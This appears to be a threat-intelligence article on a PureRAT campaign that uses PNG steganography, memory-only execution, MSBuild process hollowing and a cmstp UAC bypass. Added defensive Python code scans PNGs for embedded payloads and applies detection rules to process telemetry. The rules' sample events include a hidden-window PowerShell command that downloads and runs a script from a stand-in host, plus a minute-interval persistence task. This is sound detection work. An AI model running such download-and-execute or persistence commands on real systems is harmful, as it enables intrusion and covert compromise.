A sophisticated multi-stage cyberattack campaign delivering the PureRAT malware is leveraging advanced techniques such as PNG steganography and memory-only execution to evade detection and complicate forensic analysis. According to findings by Trellix, attackers are embedding malicious portable executable (PE) payloads inside seemingly harmless PNG images, allowing them to bypass traditional security defenses.

The attack chain starts with a weaponized Windows shortcut (.LNK) file. Instead of launching a legitimate application, the shortcut runs a hidden PowerShell command with the execution policy bypassed. This command silently downloads an obfuscated VBScript file from a remote server and executes it with the privileges of the logged-on user.

Next, the VBScript loader introduces further layers of obfuscation and persistence. It copies itself to a public directory under a random name and uses Windows Management Instrumentation (WMI) to launch additional payloads in hidden windows. Moreover, it establishes persistence by creating a Task Scheduler job that runs every minute, ensuring continuous execution without user interaction.

The attack then escalates by delivering payloads through a fileless mechanism. Instead of dropping executable files to disk, the PowerShell loader retrieves PNG images that conceal base64-encoded malware. These images appear benign but contain hidden data between custom markers. The script extracts, decodes, and loads the malicious .NET assembly directly into memory using reflection. Consequently, all critical operations remain memory-resident, significantly reducing the chances of detection.
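As an added illustration of what "hidden data between custom markers" looks like to an analyst (this is example code, not from Trellix or the article), the Python script below parses a PNG's chunk structure, flags bytes appended after the IEND chunk or chunk types outside the specification, and checks whether any long base64 run decodes to data starting with an MZ header. The 1x1 sample image, the marker strings and the two-byte "MZ" stub are constructed for the example; the campaign's actual markers are not given in the article, and the stub is not an executable.

```python
import base64
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Chunk types defined by the PNG specification and common extensions; anything
# else is worth a second look, as are bytes that follow the IEND chunk.
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP",
    b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs",
    b"sPLT", b"tIME", b"eXIf",
}

# A run of 64 or more base64-alphabet characters. Compressed image data almost
# never produces one, so a match is a strong hint of an embedded text payload.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def _chunk(ctype, data):
    """Serialize one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(trailer=b""):
    """Build a valid 1x1 white PNG (constructed sample), optionally followed by
    extra bytes that model data appended to an otherwise well-formed image."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\xff\xff")           # filter byte + 1 pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
            + _chunk(b"IEND", b"") + trailer)


# Constructed stand-in for a PE payload: only the two-byte "MZ" header the
# detector looks for, padded with NOPs; it is not an executable.
FAKE_PE = b"MZ" + b"\x90" * 94
# Constructed marker strings; the real campaign's markers are not in the article.
SAMPLE_TRAILER = b"<<PAYLOAD_START>>" + base64.b64encode(FAKE_PE) + b"<<PAYLOAD_END>>"


def walk_chunks(blob):
    """Parse the chunk list. Returns (chunks, bytes_after_iend, error_or_None)."""
    if not blob.startswith(PNG_SIGNATURE):
        return [], b"", "missing PNG signature"
    pos, chunks = len(PNG_SIGNATURE), []
    while pos + 8 <= len(blob):
        length = struct.unpack(">I", blob[pos:pos + 4])[0]
        ctype = blob[pos + 4:pos + 8]
        data = blob[pos + 8:pos + 8 + length]
        crc = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc) < 4:
            return chunks, b"", "truncated chunk"
        crc_ok = struct.unpack(">I", crc)[0] == (zlib.crc32(ctype + data) & 0xFFFFFFFF)
        chunks.append((ctype, length, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            return chunks, blob[pos:], None
    return chunks, b"", "no IEND chunk"


def find_embedded_pe(blob):
    """Return (offset, decoded_size) for each base64 run that decodes to an MZ header."""
    hits = []
    for m in B64_RUN.finditer(blob):
        core = m.group(0).rstrip(b"=")
        try:
            decoded = base64.b64decode(core + b"=" * (-len(core) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if decoded[:2] == b"MZ":
            hits.append((m.start(), len(decoded)))
    return hits


def inspect_png(blob):
    """Return a list of human-readable findings; an empty list means nothing odd."""
    findings = []
    chunks, trailer, err = walk_chunks(blob)
    if err:
        findings.append(f"structure: {err}")
    for ctype, length, crc_ok in chunks:
        if ctype not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {ctype!r} of {length} bytes")
        if not crc_ok:
            findings.append(f"bad CRC on chunk {ctype!r}")
    if trailer and err is None:
        findings.append(f"{len(trailer)} bytes after IEND")
    for offset, size in find_embedded_pe(blob):
        findings.append(f"base64 run at offset {offset} decodes to an MZ header ({size} bytes)")
    return findings


if __name__ == "__main__":
    print("clean image:", inspect_png(build_sample_png()))
    print("image with trailer:", inspect_png(build_sample_png(SAMPLE_TRAILER)))
```

The two checks are independent on purpose: trailing bytes after IEND catch appended data regardless of encoding, while the base64 scan also catches payloads hidden inside a text or non-standard chunk before IEND. Run `inspect_png` over the bytes of any downloaded PNG; an image that renders fine but produces findings is the case the article describes.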

In addition, the campaign employs advanced evasion techniques. For instance, it uses process hollowing by injecting malicious code into a legitimate MSBuild process. This allows the malware to run under the guise of a trusted, signed binary while avoiding signature-based detection. Furthermore, the attackers implement a User Account Control (UAC) bypass using the cmstp.exe utility, enabling elevated execution without triggering standard security prompts.

To avoid analysis, the malware also performs anti-virtualization checks. It scans for indicators of sandbox environments, such as VMware artifacts or QEMU-related MAC addresses. If such conditions are detected, the malware halts execution, thereby evading security researchers and automated detection systems.

Once fully deployed, the final PureRAT payload operates as a modular post-exploitation framework. It begins by collecting detailed system information, including installed security tools, hardware identifiers, operating system details, and user privileges. Subsequently, attackers can deploy additional plugins to enable capabilities such as keylogging, remote desktop access, webcam and microphone surveillance, and credential theft.

Ultimately, this campaign demonstrates how threat actors are increasingly combining multiple stealth techniques to create highly evasive, fileless malware. By exploiting trusted Windows tools and disguising payloads within image files, they significantly raise the bar for detection.

To defend against such attacks, organizations should closely monitor suspicious PowerShell activity launched from .LNK files, frequent creation of scheduled tasks, and unusual use of built-in tools like cmstp.exe and MSBuild. Additionally, security teams should inspect downloaded image files for anomalies and examine memory-resident processes for hidden .NET assemblies.
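To make that monitoring advice concrete, the Python script below (added here; it is not from the article or from Trellix) applies five heuristics drawn from the chain described above to process-creation telemetry: PowerShell launched from Explorer with the execution policy bypassed and a hidden window, a script host spawned by the WMI provider host, a scheduled task set to repeat every minute, cmstp.exe handed an .inf file by a script host, and MSBuild started by a script host. The events are constructed JSON lines that borrow Sysmon Event ID 1 field names (Image, ParentImage, CommandLine); every path, task name and URL in them is invented, and the rule names and thresholds are assumptions to tune for your environment.

```python
import json
import re

# Constructed process-creation events, one JSON object per line. Field names
# follow Sysmon Event ID 1, but all values are invented for this example and
# are not indicators from the campaign.
SAMPLE_EVENTS = r"""
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.vbs')\""}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"}
{"Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "wscript.exe //B C:\\Users\\Public\\xk3q9.vbs"}
{"Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "schtasks.exe /Create /SC MINUTE /MO 1 /TN Updater /TR \"wscript.exe //B C:\\Users\\Public\\xk3q9.vbs\" /F"}
{"Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "schtasks.exe /Create /SC DAILY /ST 02:00 /TN NightlyBackup /TR C:\\Tools\\backup.exe"}
{"Image": "C:\\Windows\\System32\\cmstp.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "cmstp.exe C:\\Users\\Public\\profile.inf"}
{"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "MSBuild.exe"}
{"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "ParentImage": "C:\\Program Files\\Microsoft Visual Studio\\devenv.exe", "CommandLine": "MSBuild.exe C:\\src\\app.sln"}
"""

# Interpreters that the chain in the article uses to launch its next stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}


def _name(path):
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_lnk_style_powershell(ev):
    """PowerShell started by Explorer (as a double-clicked .LNK is) with the
    execution policy bypassed and a hidden window."""
    cl = ev["CommandLine"]
    return (_name(ev["Image"]) in {"powershell.exe", "pwsh.exe"}
            and _name(ev["ParentImage"]) == "explorer.exe"
            and re.search(r"-(executionpolicy|ep)\s+bypass", cl, re.I) is not None
            and re.search(r"-(windowstyle|w)\s+hidden", cl, re.I) is not None)


def rule_wmi_spawned_script_host(ev):
    """Script host whose parent is the WMI provider host: launched via WMI, not by a user."""
    return _name(ev["ParentImage"]) == "wmiprvse.exe" and _name(ev["Image"]) in SCRIPT_HOSTS


def rule_minute_scheduled_task(ev):
    """Task created to repeat every minute, the persistence interval named in the article."""
    cl = ev["CommandLine"]
    return (_name(ev["Image"]) == "schtasks.exe"
            and re.search(r"/create\b", cl, re.I) is not None
            and re.search(r"/sc\s+minute\b", cl, re.I) is not None)


def rule_cmstp_inf_from_script(ev):
    """cmstp.exe given an .inf file by a script host (heuristic: assumed rare in normal use)."""
    return (_name(ev["Image"]) == "cmstp.exe"
            and ".inf" in ev["CommandLine"].lower()
            and _name(ev["ParentImage"]) in SCRIPT_HOSTS)


def rule_msbuild_from_script(ev):
    """MSBuild started by a script host rather than an IDE or build agent."""
    return _name(ev["Image"]) == "msbuild.exe" and _name(ev["ParentImage"]) in SCRIPT_HOSTS


RULES = {
    "lnk_style_powershell": rule_lnk_style_powershell,
    "wmi_spawned_script_host": rule_wmi_spawned_script_host,
    "minute_scheduled_task": rule_minute_scheduled_task,
    "cmstp_inf_from_script": rule_cmstp_inf_from_script,
    "msbuild_from_script": rule_msbuild_from_script,
}


def parse_events(text):
    """Parse JSON lines, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def run_rules(events):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


def detect_sample():
    """Run all rules over the constructed sample; the benign events produce no hits."""
    return run_rules(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for i, name in detect_sample():
        print(f"event {i}: {name}")
```

Each rule keys on a parent-child relationship as much as on the command line, because the article's chain is defined by which trusted binary launches which: Explorer launching PowerShell, WmiPrvSE launching a script host, a script host launching cmstp.exe or MSBuild. The benign lines (a plain PowerShell script, a daily backup task, MSBuild under Visual Studio) are there to show the rules do not fire on ordinary use of the same tools.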

As cyber threats continue to evolve, this campaign highlights the urgent need for advanced detection strategies that go beyond traditional file-based security measures.
